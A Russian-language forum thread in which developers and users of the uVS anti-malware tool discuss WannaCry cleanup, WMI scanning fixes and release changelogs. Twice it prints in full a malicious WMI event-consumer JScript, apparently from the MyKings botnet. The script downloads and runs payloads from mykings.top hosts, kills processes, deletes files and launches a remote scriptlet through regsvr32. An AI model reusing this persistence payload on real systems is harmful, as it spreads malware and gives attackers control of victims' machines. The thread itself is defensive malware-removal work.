Перейти к содержанию
demkd

Recommended Posts

santy    151

santy
Опубликовано
25 минут назад, demkd сказал:

нашел кого цитировать xD

ну, или так:

Цитата

Сегодня (примечание: без объявления войны), 12 мая 2017 года, компании и организации из самых разных стран мира (включая Россию) начали массово сообщать об атаках шифровальщика Wana Decrypt0r, который также известен под названиями WCry, WannaCry, WannaCrypt0r и WannaCrypt.

Впервые вымогатель WCry был обнаружен еще в феврале 2017 года, но тогда он не произвел большого впечатления на специалистов. По сути, до сегодняшнего дня шифровальщик был практически неактивен, но теперь он получил версию 2.0 и использует SMB-эксплоит АНБ из инструментария, опубликованного ранее хакерской группой The Shadow Brokers.

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

santy    151

santy
Опубликовано

как временная мера:

 

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
bp C:\WINDOWS\MSSECSVC.EXE
bl DB349B97C37D22F5EA1D1841E3C89EB4 3723264
bp C:\PROGRAMDATA\MHLNIUXMEKA934\TASKSCHE.EXE
bl 84C82835A5D21BBCF75A61706D8AB549 3514368
bp C:\USERS\PUBLIC\DESKTOP\@WANADECRYPTOR@.EXE
bl 7BF2B57F2A205768755C07F238FB32CC 245760
restart


перезагрузка, пишем о старых и новых проблемах.
------------

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
2 часа назад, santy сказал:

https://xakep.ru/2017/05/12/wcry-ransomware-apocalypse/

вот это мне кажется больше похоже на правду
"Сбербанк, МВД и МЧС заявили, что хакерам не удалось проникнуть через их системы защиты.«Все попытки вирусных атак на компьютеры были блокированы, заражению не подвергся ни один компьютер. Все интернет-ресурсы МЧС России работают в штатном режиме», — приводит ТАСС слова представителя ведомства."
Тут обычная проблема с дырой в винде, те кто был без надежных фаеров и полегли в очередной раз, ничему не учатся, хотя давно понятно что ходить в инет без железного (в виде роутера) и софтового фаера на машине мягко говоря глупо.
В данном случае и накладно, тем более что адреса для получения выкупа далеко не уникальны и надеяться на разблокировку путем откупа не приходится.
Да и обновляться таки нужно (в данном случае MS17-010 нужен как минимум), а не отключать автоматическое обновление или сидеть на устаревших осях.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано

С WMI проблема была в том что не просматривались все неймспейсы, исправил.
Проблема c FireFox и русскими именами пользователей в путях дополнений осталась... эти.... затейливый клоуны используют непонятную 4-х байтовую кодировку символов, когда время будет разберусь, с ходу я так и не понял что это и главное ЗАЧЕМ ЭТО?

---------------------------------------------------------
 4.0.3
---------------------------------------------------------
 o Улучшена функция поиска обработчиков WMI, теперь просматриваются все неймспейсы.

 

  • Upvote 1

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

santy    151

santy
Опубликовано

demkd,

хорошо, тема с обработчиком событий в WMI опять всплыла.

и пока что здесь не решена.

https://forum.kasperskyclub.ru/index.php?showtopic=55590

может получиться на ней проверить.

 

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
11 минут назад, santy сказал:

может получиться на ней проверить.

эта версия точно должна видеть, обработчик скорее всего сидел в default неймспейсе, autoruns его просматривает, а uVS не просматривал.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

santy    151

santy
Опубликовано

запросил образ от 4.0.3,

но

здесь и версия 4.0.2 видит его,


 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

                            

 

HOME-9BAC17A5E2_2017-05-13_19-03-52.7z

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
10 минут назад, santy сказал:

здесь и версия 4.0.2 видит его,

Потому что он в "subscription" неймспейсе, возможно копия и в default сидит, поэтому таки лучше использовать 4.0.3
по идее можно и в другие неймспейсы инсталлировать поддержку обработчиков и будет работать в каком-нибудь "microsoft", но до этого вирусописатели похоже еще не додумались, впрочем теперь уже без разницы, uVS будет видеть его и там.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

Demkd

А как эта вся картинка целиком выглядит

Как всё работает - механика так сказать ?

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

+

По поводу SHA1 для WMI

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

santy    151

santy
Опубликовано

новый образ, спасибо ребятам с фанклуба ЛК.

 

Цитата

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Namespace                   \\.\root\subscription
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="http://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"http://wmi.mykings.top:8888/kill.html\";http = new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr.split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"http://wmi.mykings.top:8888/test.html\",http=new ActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr.split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};


 

                           

HOME-9BAC17A5E2_2017-05-13_19-26-30.7z

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

+

Сейчас открыл: C:\WINDOWS\system32\wbem

там, есть: C:\WINDOWS\system32\wbem\AutoRecover   с файликами

А не может так получиться, что мы запись удалим...

А она возьмёт и AutoRecover...

И я бы всё таки посмотрел: C:\WINDOWS\system32\wbem\Framework

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

+

Сравнил выше приведённые скрипты.

Версия: 4.0.3 содержит дополнительную запись:

25 минут назад, santy сказал:

Namespace                   \\.\root\subscription

Которой нет в: 4.0.2

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
1 час назад, PR55.RP55 сказал:

Как всё работает - механика так сказать ?

я ссылки давал на msdn там все расписано что и как.
 

1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

14 минут назад, PR55.RP55 сказал:

Которой нет в: 4.0.2

Да, теперь указывается неймспейс,  но в след версиях я думаю я его перенесу в путь до объекта.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано
18 минут назад, demkd сказал:
1 час назад, PR55.RP55 сказал:

А, что если вычислять глобальный SHA1 по всем данным из Инфо.

В данный момент это не имеет смысла.

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

Расчёт  общей суммы ( глобального ) SHA1 для : Инфо.

как раз и позволит создать уникальный идентификатор.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
7 часов назад, PR55.RP55 сказал:

В системах есть _постоянные легальные записи с фиксированным именем и содержимым.

1 штук.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано

Что там за кодировку использовали клоуны из мозиллы я так и не нашел, но декодер сделал, будет ли декодировать что-то отличное от кириллицы я не знаю, проверять желания нет.

---------------------------------------------------------
 4.0.4
---------------------------------------------------------
 o Исправлена ошибка в функции анализа расширений Firefox.

 o Добавлена поддержка кириллицы в пути до расширения Firefox.

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано
В 11.05.2017 at 11:18 PM, demkd сказал:
В 11.05.2017 at 9:01 PM, PR55.RP55 сказал:

Такие объекты сразу должны попадать в подозрительные.

это да.

В новых версиях я этого не вижу.

Demkd

А вообще есть какой - то блокнот\планировщик, чтобы всё - всё помнить ?   :(

:)

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

+

Даже и не знаю...

-------------

Полное имя                  C:\USERS\ADMIN\DOWNLOADS\UVS_LATEST.ZIP
Имя файла                   UVS_LATEST.ZIP
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
Размер                      3387073 байт
Создан                      15.05.2017 в 16:42:45
Изменен                     15.05.2017 в 16:43:00
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\uvs_latest.zip"
SHA1                        C690C80CFD215299BCAE4E28DAC99467A64B51C6
MD5                         1DDB17583AD3E710A5ECEA5B7AC19285
                            

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

alamor    69

alamor
Опубликовано
14 часов назад, PR55.RP55 сказал:

Даже и не знаю...

Тоже  заметил в последнее время много подобных файлов, которые раньше вроде не выводились.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

santy    151

santy
Опубликовано

demkd,

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Цитата

Анализ автозапуска...
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!
(!)WMI Error: CoInitializeEx failed!

образ здесь:

МАКСИМ-ПК_2017-05-21_16-08-54.7z

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

Посмотрел образ и мне мысля пришла...

А, что если рассчитывать SHA1 не только для файлов\объектов но и для  cmd и аналогичных записей.

типа:

"C:\Program Files\Common Files\Doctor Web\Scanning Engine\dwantispam.exe" -pipe:ASServer.Dr.Web -path:"C:\Program Files\Common Files\Doctor Web\Scanning Engine\\"

Таким образом можно автоматически определить легальна данная запись, или нет.

К примеру в системе\образе есть некий объект - его SHA1 нет в базе проверенных но для его деятельности:  команда\ы легальны и есть в базе...

т.е. Такой гибкий способ проверки.

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

PR55.RP55    82

PR55.RP55
Опубликовано

+

Может быть рассчитывать не именно SHA1 - а некий его аналог = идентификатор.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано
4 часа назад, santy сказал:

посмотри, чем может быть вызвано это сообщение в логе? проблема была в скриптах WMI, но ему судя по сообщению почистили этот скрипт руками, а образ был сделан уже после всех очисток.

Гляну.

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

demkd    603

demkd
Опубликовано

---------------------------------------------------------
 4.0.5
---------------------------------------------------------
 o Добавлен вывод ошибок инициализации com-интерфейса.

 o Добавлен фильтр на расширения в функцию анализа параметров запуска.

 o При сканировании списка по F3/F7 статус подозрительного файла получают все исполняемые файлы с нестандартными расширениями.

 

Поделиться сообщением

Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Перейти к списку тем Universal Virus Sniffer (uVS) - развитие, использование и решение проблем

  • Сообщения

    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      а внутри локалки и не получится, белые ip нужны только при подключении через интернет.
    • santy
      uVS - Тестирование

      От santy · Опубликовано

      Проверил на двух домашних ПК в локальной сети с роутером. Схема с серым IP работает отлично. Передача файлов гениальна! Вот просто как будто дополнительное зрение появилось :). Через белый IP  пока не удалось подключиться. Пришлось еще фаерволлы включить в интерактивный режим. (На автомате еще не проверял, возможно надо сохранить некоторые правила.)
    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      ---------------------------------------------------------
       4.99.4
      ---------------------------------------------------------
       o Исправлена функция автоматического переключения удаленных рабочих столов.
         Проблема проявлялась при работе с удаленной системой через локальную сеть, при запуске приложения
         от имени администратора не происходило автоматическое переключение на защищенный рабочий стол.
         (не касается полной версии разового доступа к рабочему столу, в этом режиме проблемы не было).

       o Проведено сравнительное тестирование системного удаленного рабочего стола и uVS.
         Передача файлов через системный удаленный рабочий стол идет почти в 20 раз медленней чем через через uVS.
         Максимальный fps в 32-х битном цвете почти в 3 раза ниже чем у uVS в FHD.
         (!) Выявлена проблема совместного использования uVS и системного рабочего стола.
         (!) Если системный рабочий стол был закрыт БЕЗ выхода из пользователя, то uVS не сможет
         (!) отбразить рабочий стол логона пользователя (Winlogon).
         (!) Единственное решение проблемы: подключиться заново через системный рабочий стол и выйти из пользователя.
       
    • demkd
      uVS - Тестирование

      От demkd · Опубликовано

      ---------------------------------------------------------
       4.99.3
      ---------------------------------------------------------
       o Это обновление повышает качество работы с удаленной системой и добавляет новый режим работы.
         (!) Новая функция не совместима со старыми версиями uVS, если у вас в настройках установлен флаг bReUseRemote = 1,
         (!) то перед обновлением необходимо закрыть все серверные части uVS на удаленных компьютерах с помощью
         (!) старой версии uVS.

       o Добавлен новый режим работы: Разовый доступ к удаленному компьютеру.
         (!) Доступно начиная с Vista, подключение к рабочему столу устаревших систем возможно лишь прежним способом.
         Ранее просмотр и управление рабочим столом удаленного компьютера было вспомогательной функцией при работе с удаленной системой.
         Для подключения требовались полномочия администратора или знание логина и пароля администратора удаленного компьютера и
         физическая возможность подключения к удаленному компьютеру.
         Новый режим работы похож на то, что предлагают всевозможные поделки для удаленного администрирования.
         o В этом режиме доступно: управление и просмотр рабочего стола, а также быстрый и надежный обмен файлами на пределе пропускной
           способности канала. (для сравнения RAdmin в гигабитной сети передает файлы более чем в 15 раз медленней чем uVS).
         o Передаваемые кадры теперь не только сжимаются, но и шифруются,  целостность передаваемых файлов защищена
           проверочным хэшем и шифрованием.
         o Подключение осуществляется без использования промежуточного сервера, т.е. это чистый P2P.
         o Подключение возможно к компьютеру за NAT при включенной у роутера опции uPNP.
         o Подключение возможно к компьютеру, где активирован VPN.
           (!) Подключение производится к реальному адресу роутера или адаптера компьютера с VPN, VPN канал полностью игнорируется.
         o Подключение возможно в обе стороны, т.е. из пары компьютеров требуется лишь 1 белый IP, направление подключения выбирается
           при начальной настройке.

         При запуске start.exe теперь вам доступны три новые кнопки:
         o Управление удаленным компьютером и обмен файлами.
           Эту кнопку нажимает тот кто хочет получить доступ к удаленному компьютеру, в открывшемся окне можно выбрать
           вариант подключения (см. ниже) и ввести код доступа полученный от того кто предоставляет доступ к компьютеру.
           Варианты подключения:
             o Соединение примет мой компьютер - в этом случае необходимо выбрать IP к которому будет подключаться другая
               сторона. При подключении через интернет следует выбирать белый IP адрес, если ваш компьютер за роутером
               и на нем активен NAT, то выбрать нужно именно его IP адрес. (адрес с пометкой [router]).
               Если роутер поддерживает uPNP, то этот адрес будет выбран по умолчанию.
               Если же в списке нет белых IP то вам следует выбрать другую опцию подключения.
               После выбора IP просто нажмите кнопку Старт и передайте одноразовый код доступа другой стороне.
               При подключении по локальной сети вы можете нажать кнопку "Все IP" и выбрать любой серый адрес для подключения.
               Поддерживается и IPv4 и IPv6.
               (!) Код доступа автоматически копируется в буфер обмена при нажатии кнопки "Старт".

             o Соединение установит мой компьютер - просто скопируйте код доступа в поле ввода или код там появится автоматически
               если вы его скопировали из мессенджера. После чего нажмите кнопку Старт и ожидайте подключения.

         o Разовый удаленный доступ к моему компьютеру [админ]
           (!)Пользователь должен обладать правами администратора или правами по запуску и установке служб.
           Эту кнопку нажимает тот кто хочет предоставить доступ к своему компьютеру, в открывшемся окне можно выбрать
           разрешения для другой стороны.
           Доступны 3 варианта:
             o  Управление     - доступно: мышь, клавиатура, просмотр экрана и обмен файлами.
             o  Просмотр       - доступно: просмотр экрана и обмен файлами.
             o  Обмен файлами  - доступно: обмен файлами.
           Это полнофункциональная версия удаленного рабочего стола uVS, с возможностью удаленного подтверждения
           запуска приложений от имени администратора и эмуляции нажатия Ctrl+Alt+Del.

         o Разовый удаленный доступ к моему компьютеру [не админ]
           Все тоже самое что и во 2-м случае, кроме удаленного подтверждения запуска приложений от имени администратора
           и эмуляции нажатия Ctrl+Alt+Del, дополнительно есть ограничение по использованию защищенных рабочих столов.

       o При работе с удаленным рабочим столом теперь доступна передача файлов и каталогов из буфера обмена в обе стороны.
         Что бы передать файлы или целые каталоги на удаленный компьютер, просто скопируйте их в буфер обмена и в окне
         удаленного рабочего стола нажмите кнопку со стрелкой вверх.
         Передача изображения автоматически отключится и откроется окно с логом передачи файлов.
         В заголовке окна лога вы увидите объем переданных данных и среднюю скорость передачи (с учетом чтения их с диска).
         По окончании передачи  файлов в лог будет выведена информации о времени передачи, количестве успешно переданных файлов и
         средней скорости передачи.
         Переданные файлы будут помещены в буфер обмена удаленной системы и вы сможете  вставить их из буфера
         в любой каталог или прямо на рабочий стол. При этом файлы переносятся из временного каталога.
         Если же вы не вставили файлы из буфера обмена то они останутся во временном каталоге C:\uVS_copyfiles\*
         точный путь до которого выводится в лог на удаленном компьютере.
         Что бы получить файлы проделайте обратную операцию: скопируйте файлы в буфер обмена на удаленном компьютере
         и нажмите кнопку со стрелкой вниз, по завершению передачи файлы будут помещены в буфер обмена вашего компьютера
         и вы можете перенести их в любую нужную папку.
         Таким образом обе стороны видят какие файлы и куда копируются и при этом максимально упрощается процесс копирования.
         (!) При закрытии окна лога передача файлов будет остановлена.
         (!) При разрыве соединения передача файлов будет автоматически продолжена после восстановления соединения,
         (!) при этом работает функция докачки, т.е. если ошибка произошла при передаче большого файла, то передача его
         (!) продолжится с последнего успешно полученного блока, т.е. блок будет заново.
         (!) Каждая передача файлов является независимой, т.е. нельзя прервать передачу и воспользоваться функцией докачки.
         (!) Проверка целостности файлов производится на лету вместе с его расшифровкой, таким образом достигается
         (!) максимально возможная скорость передачи примерно равная скорости копирования файлов по локальной сети системой.
         (!) При необходимости передачи большого количества мелких файлов рекомендуется поместить их в архив, это серьезно
         (!) сократит время передачи.
         (!) Состоянии кнопки CS никак не влияет на данный функционал.

       o Изменен приоритет протоколов: IPv4 теперь является приоритетным, как показали замеры в гигабитной локальной сети
         IPv4 позволяет достичь более высокой скорости передачи данных.

       o Добавлено шифрование сжатых кадров удаленного рабочего стола для повышения защиты передаваемой по сети информации.

       o В случае разрыва соединения повторное подключение происходит автоматически без запроса.

       o Снижен инпут лаг при работе с удаленным рабочим столом.

       o Обновлена функция синхронизации буфера обмена с удаленной системой: теперь поддерживается передача скриншотов
         в обе стороны.

       o Обновлена функция передачи движений мыши в удаленную систему.
         Теперь доступно управление с помощью движений мыши, которое используется в некоторых приложениях и играх. (если нажата кнопка MM)
         Если указатель мыши видим в удаленной системе то управление производится позиционированием указателя по расчетным координатам (как и раньше),
         в противном случае указатель скрывается в клиентской системе и передаются лишь движения мыши.
         При возникновении проблем с восстановлением видимости указателя вы всегда можете переключиться из окна удаленной рабочего стола по горячей
         клавише RWin.

       o uVS теперь при старте добавляется в исключения Ф и брандмауэра до выхода из uVS.

       o Теперь запоминаются размеры и режим отображения удаленного рабочего стола для каждого активного монитора.
         Кнопка 1:1 применяется автоматически при первом выборе монитора.
         Обработчик кнопки 1:1 обновлен, теперь размер окна рассчитывается с высокой точностью для новых систем,
         где размер окна включает в себя тень.

       o Добавлен выбор метода захвата экрана, доступно 3 варианта:
         o GDI -  медленный метод захвата экрана, но работает в любой удаленной системе, постоянный fps.
                  (единственный доступный метод для Win2k-Win7)

         o DDA1 - быстрый, работает начиная с Windows 8, максимальный коэффициент сжатия,
                  переменный fps в зависимости от экранной активности.
                  (!) рекомендуется использовать при ширине канала ниже 100Mbit, вместо DDA2.

